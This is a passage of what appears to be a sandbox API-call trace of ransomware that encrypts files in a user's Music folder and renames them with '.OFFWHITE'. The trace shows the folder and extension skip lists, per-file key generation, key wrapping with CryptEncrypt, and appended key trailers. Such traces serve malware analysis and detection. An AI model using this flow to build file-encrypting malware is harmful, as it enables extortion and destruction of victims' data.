MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\zulailxuctuhbjdk51.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ZuLAilXUctuhbjdK51.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\zulailxuctuhbjdk51.m4a.offwhite")) returned 1 [0135.001] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fa7d60, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xfdcdfa0, ftLastAccessTime.dwHighDateTime=0x1d5e7e8, ftLastWriteTime.dwLowDateTime=0xfdcdfa0, ftLastWriteTime.dwHighDateTime=0x1d5e7e8, nFileSizeHigh=0x0, nFileSizeLow=0x16fb7, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="ZuLAilXUctuhbjdK51.m4a", cAlternateFileName="ZULAIL~1.M4A")) returned 0 [0135.001] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0135.001] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2371a320, ftCreationTime.dwHighDateTime=0x1d5e090, ftLastAccessTime.dwLowDateTime=0x688ba1f0, ftLastAccessTime.dwHighDateTime=0x1d5dddd, ftLastWriteTime.dwLowDateTime=0x688ba1f0, ftLastWriteTime.dwHighDateTime=0x1d5dddd, nFileSizeHigh=0x0, nFileSizeLow=0x6d2e, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="JjQuldAU4LEb0.wav", cAlternateFileName="JJQULD~1.WAV")) returned 1 [0135.001] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2=".") returned 1 [0135.001] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="..") returned 1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="...") returned 1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="windows") returned -1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="$recycle.bin") returned 1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="rsa") returned -1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="ntuser.dat") returned -1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="programdata") returned -1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="appdata") returned 1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="program files") returned -1 [0135.002] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="program files (x86)") returned -1 [0135.002] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0135.002] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="JjQuldAU4LEb0.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav" [0135.002] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.002] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.002] PathFindExtensionW (pszPath="JjQuldAU4LEb0.wav") returned=".wav" [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.002] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.003] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.003] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.003] lstrcmpiW (lpString1="JjQuldAU4LEb0.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.003] GetProcessHeap () returned 0x500000 [0135.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531880 [0135.003] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\jjquldau4leb0.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.004] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=27950) returned 1 [0135.004] GetProcessHeap () returned 0x500000 [0135.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.004] GetProcessHeap () returned 0x500000 [0135.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.004] GetProcessHeap () returned 0x500000 [0135.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.004] GetProcessHeap () returned 0x500000 [0135.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.004] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.004] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.004] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.004] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.004] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.005] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.005] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6d2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.005] SetLastError (dwErrCode=0x0) [0135.005] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.007] GetLastError () returned 0x0 [0135.007] GetLastError () returned 0x0 [0135.007] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6e2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.007] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.007] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6f2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.007] WriteFile (in: hFile=0x214, lpBuffer=0x531880*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x531880*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.007] GetProcessHeap () returned 0x500000 [0135.007] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6d2e) returned 0x55b7c0 [0135.007] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.008] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x6d2e, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x6d2e, lpOverlapped=0x0) returned 1 [0135.010] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.010] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x6d2e, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x6d2e, lpOverlapped=0x0) returned 1 [0135.010] GetProcessHeap () returned 0x500000 [0135.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.010] CloseHandle (hObject=0x214) returned 1 [0135.014] GetProcessHeap () returned 0x500000 [0135.014] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.014] GetProcessHeap () returned 0x500000 [0135.014] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.014] GetProcessHeap () returned 0x500000 [0135.014] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.015] GetProcessHeap () returned 0x500000 [0135.015] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.015] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav" [0135.015] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav.OFFWHITE" [0135.015] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\jjquldau4leb0.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\JjQuldAU4LEb0.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\jjquldau4leb0.wav.offwhite")) returned 1 [0135.015] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x123e6de0, ftCreationTime.dwHighDateTime=0x1d5e3d8, ftLastAccessTime.dwLowDateTime=0x40517970, ftLastAccessTime.dwHighDateTime=0x1d5d8b1, ftLastWriteTime.dwLowDateTime=0x40517970, ftLastWriteTime.dwHighDateTime=0x1d5d8b1, nFileSizeHigh=0x0, nFileSizeLow=0xab8b, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="m_S itN7UtH7W8lpF.wav", cAlternateFileName="M_SITN~1.WAV")) returned 1 [0135.015] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2=".") returned 1 [0135.015] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="..") returned 1 [0135.015] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="...") returned 1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="windows") returned -1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="$recycle.bin") returned 1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="rsa") returned -1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="ntuser.dat") returned -1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="programdata") returned -1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="appdata") returned 1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="program files") returned -1 [0135.016] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="program files (x86)") returned -1 [0135.016] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0135.016] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="m_S itN7UtH7W8lpF.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav" [0135.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.016] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.016] PathFindExtensionW (pszPath="m_S itN7UtH7W8lpF.wav") returned=".wav" [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.016] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.017] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.017] lstrcmpiW (lpString1="m_S itN7UtH7W8lpF.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.017] GetProcessHeap () returned 0x500000 [0135.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531890 [0135.017] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\m_s itn7uth7w8lpf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.018] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=43915) returned 1 [0135.018] GetProcessHeap () returned 0x500000 [0135.018] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.018] GetProcessHeap () returned 0x500000 [0135.018] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.018] GetProcessHeap () returned 0x500000 [0135.018] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.018] GetProcessHeap () returned 0x500000 [0135.018] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.018] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.018] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.018] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.018] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.018] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.018] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.018] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.018] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.018] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.019] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.019] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.019] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.019] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xab8b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.019] SetLastError (dwErrCode=0x0) [0135.019] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.021] GetLastError () returned 0x0 [0135.021] GetLastError () returned 0x0 [0135.021] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xac8b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.021] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.021] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xad8b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.021] WriteFile (in: hFile=0x214, lpBuffer=0x531890*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x531890*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.021] GetProcessHeap () returned 0x500000 [0135.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xab8b) returned 0x55b7c0 [0135.021] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.022] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xab8b, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xab8b, lpOverlapped=0x0) returned 1 [0135.025] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.025] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xab8b, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xab8b, lpOverlapped=0x0) returned 1 [0135.025] GetProcessHeap () returned 0x500000 [0135.025] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.025] CloseHandle (hObject=0x214) returned 1 [0135.028] GetProcessHeap () returned 0x500000 [0135.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.028] GetProcessHeap () returned 0x500000 [0135.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.028] GetProcessHeap () returned 0x500000 [0135.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.028] GetProcessHeap () returned 0x500000 [0135.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.028] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav" [0135.028] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav.OFFWHITE" [0135.028] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\m_s itn7uth7w8lpf.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\m_S itN7UtH7W8lpF.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\m_s itn7uth7w8lpf.wav.offwhite")) returned 1 [0135.029] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6af2fb10, ftCreationTime.dwHighDateTime=0x1d5e74b, ftLastAccessTime.dwLowDateTime=0x60f4ce0, ftLastAccessTime.dwHighDateTime=0x1d5e52e, ftLastWriteTime.dwLowDateTime=0x60f4ce0, ftLastWriteTime.dwHighDateTime=0x1d5e52e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="nJ5q3Y TzGq", cAlternateFileName="NJ5Q3Y~1")) returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2=".") returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="..") returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="...") returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="windows") returned -1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="$recycle.bin") returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="rsa") returned -1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="ntuser.dat") returned -1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="programdata") returned -1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="appdata") returned 1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="program files") returned -1 [0135.029] lstrcmpiW (lpString1="nJ5q3Y TzGq", lpString2="program files (x86)") returned -1 [0135.029] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0135.029] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="nJ5q3Y TzGq" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq" [0135.029] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.029] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.029] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\*.*" [0135.030] FindFirstFileW (in: 